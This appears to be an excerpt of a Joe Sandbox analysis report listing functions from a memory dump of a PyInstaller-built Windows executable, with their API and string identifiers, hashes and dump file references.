                                                                                                                                                            Function 00007FF6D6EAB3CC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                                                                                                                            • Instruction ID: 8ed5e463cfee3328c860ddc3f024ac5388f71c1ad5eea2e75899808203d62952
                                                                                                                                                            • Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                                                                                                                            • Instruction Fuzzy Hash: 54314132A1CB8185EB60CF29E8406AE73A4FB88758F540136EA9D83B54EF3DD565CB00
                                                                                                                                                            Function 00007FF6D6EB26C4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                            • Opcode ID: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                                                                                                                            • Instruction ID: 17256d297eddafdd22524694a2ac77ef2830e0f820bff658ccadf311e60fb6a9
                                                                                                                                                            • Opcode Fuzzy Hash: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                                                                                                                            • Instruction Fuzzy Hash: 7AB1C022F1C79645EA61DB29E4006BD63A1EF44BE4F444133EA6D87BC9DE7EE461C300
                                                                                                                                                            Function 00007FF6D6E953F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                            • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                            • API String ID: 190572456-4266016200
                                                                                                                                                            • Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                                                                                                                            • Instruction ID: c18c69c609f89b6c843645e0327ba2fc45b5e5a890a8f80464776e1af634ff82
                                                                                                                                                            • Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                                                                                                                            • Instruction Fuzzy Hash: 2812AF64E1EB03A0FE598B08A89017C27A1AF58759F885437D80E863A4EF7FB57DD640
                                                                                                                                                            Function 00007FF6D6E97100 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                            • API String ID: 190572456-2208601799
                                                                                                                                                            • Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                                                                                                                            • Instruction ID: 677bd7653bbde10b92ba86397fba4db6aae7331bfc9abcc9b251b19053ba8a2f
                                                                                                                                                            • Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                                                                                                                            • Instruction Fuzzy Hash: DAE1D364E1EB5391FE59CB09A89017C23B6AF05B94F985433D80E863A4EF7FB56CC211
                                                                                                                                                            Function 00007FF6D6E912A0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message_fread_nolock
                                                                                                                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                            • API String ID: 3065259568-2316137593
                                                                                                                                                            • Opcode ID: 90faa21b7983291415bb8c8d19430feaa620186f63325b8c63e4147ca010c192
                                                                                                                                                            • Instruction ID: 9295c4a79e7b01df62d1ae1aa5b8ce5ab083c531f5d612c4ac9cedf517dbfbea
                                                                                                                                                            • Opcode Fuzzy Hash: 90faa21b7983291415bb8c8d19430feaa620186f63325b8c63e4147ca010c192
                                                                                                                                                            • Instruction Fuzzy Hash: BA518F61F0D68346EA20A725A4516FE62A4EF48BCCF404033EE4DC7A96EE3EE561D700
                                                                                                                                                            Function 00007FF6D6E923D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                            • String ID: P%
                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                            • Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                                                                                            • Instruction ID: bea49dcbeb00e734c40cd3ebe154a23a60e0bd0ec888b8cc4160bf4b4799f41e
                                                                                                                                                            • Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                                                                                            • Instruction Fuzzy Hash: 5A51F536A1CBA186D6349F26E4181BEB7A1FB98B65F004122EFCE83694DF3DD055DB10
                                                                                                                                                            Function 00007FF6D6E98770 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF6D6E92A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98797
                                                                                                                                                            • FormatMessageW.KERNEL32 ref: 00007FF6D6E987C6
                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF6D6E9881C
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                            • Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                                                                                            • Instruction ID: 4a96834d35f5e67b63d37f5d351abfdd7d3188f358975353b9a4632abc25d328
                                                                                                                                                            • Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                                                                                            • Instruction Fuzzy Hash: BA217F31E1CB4281FB649B25F84426E63A1FF88788F840537E64DC26A4EF3EE165CB10
                                                                                                                                                            Function 00007FF6D6EA6CE0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                            • Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                                                                                            • Instruction ID: 12de912f49d1255d7e288afd4d3ed02fd86e213e29e70875061f587f5f6dcad7
                                                                                                                                                            • Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                                                                                            • Instruction Fuzzy Hash: 8612812AE0C16386FF20DA14D058A7D76B1FB50758F954137E68A876C4DF3EE9A48B10
                                                                                                                                                            Function 00007FF6D6EA18F8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                            • Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                                                                                            • Instruction ID: 570bcd2290626459c113f4a4d461e5861261a86a207183987d7ba59716901170
                                                                                                                                                            • Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                                                                                            • Instruction Fuzzy Hash: 3712A672E1C18386FB649A15D054AFD76B2FB80754F988137E699C6AC4DF7EE4A0CB00
                                                                                                                                                            Function 00007FF6D6E91590 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                            • Opcode ID: 3b5cf1eac5e72d3199d79bba3decd445bd78e665beb76065e3f0144eb066be1d
                                                                                                                                                            • Instruction ID: 21b9bee049890abc1ed42541fe5b1fd549b88e2a8cb18a58e6aba3926248cad0
                                                                                                                                                            • Opcode Fuzzy Hash: 3b5cf1eac5e72d3199d79bba3decd445bd78e665beb76065e3f0144eb066be1d
                                                                                                                                                            • Instruction Fuzzy Hash: 64316D21F1C64286EE24DB16E8405FE63A0AF48BD8F484033DA4DC7A96EE3EE561D300
                                                                                                                                                            Function 00007FF6D6E9F330 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                                                                                            • Instruction ID: efb7b623bc14b2e3d6a8bd311ce435b5ee0e865cac853fa828d69f70fd3c0cbb
                                                                                                                                                            • Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                                                                                            • Instruction Fuzzy Hash: 1BD19D32E1CB4286EB209B6595402AD77A0FF4579CF100137EE8D97B9ADF39E4A1C740
                                                                                                                                                            Function 00007FF6D6E989B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98A47
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98A9E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                            • Opcode ID: 68ef013f5c257526e5a4a2decc1cb5deb5404ee9189374e1049a365f6b0b0852
                                                                                                                                                            • Instruction ID: 4f28855b4bf829de47375e3605cc4eb60f0ef36a29750302c04ccbd8166329f2
                                                                                                                                                            • Opcode Fuzzy Hash: 68ef013f5c257526e5a4a2decc1cb5deb5404ee9189374e1049a365f6b0b0852
                                                                                                                                                            • Instruction Fuzzy Hash: E5417132E0CB8282E660CF15B84016EB6A5FF84B94F584937DA8D87BA5EF7DD465C700
                                                                                                                                                            Function 00007FF6D6E98EF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6D6E939CA), ref: 00007FF6D6E98F31
